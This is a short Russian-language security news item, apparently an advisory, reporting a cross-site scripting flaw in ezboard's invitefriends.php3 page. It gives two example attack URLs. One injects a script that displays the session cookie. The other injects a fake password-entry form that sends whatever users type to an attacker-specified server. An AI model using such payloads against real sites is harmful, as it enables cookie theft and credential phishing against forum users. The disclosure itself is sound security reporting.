В ezboard обнаружена возможность Cross site
scripting'а.

Например:

http://www.ezboard.com/invitefriends.php3? action=http://pub80.ezboard.com/ano.doTel 
lAFriend&yourName= dav%22%3E%3Cscript%3Ealert( document.cookie);%3C/script%3E

или

http://www.ezboard.com/invitefriends.php3? action=http://[server]&yourName=%22%3E 
%3Cp%3E%3Cb%3EYou%20must%20 enter%20your%20password%20to%20invite%20
a%20friend%3C/b%3E%3Cp%3E%3Cinput%20 type=password%20name=pass%3E%3 Cp%3E%
3Cb%3EEnter%20your%20friend%20address%3 C/b%3E%3Cp%3E%3Cinput
%20type=text%20name= mail%3E%3C/form%3E%3C!--

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии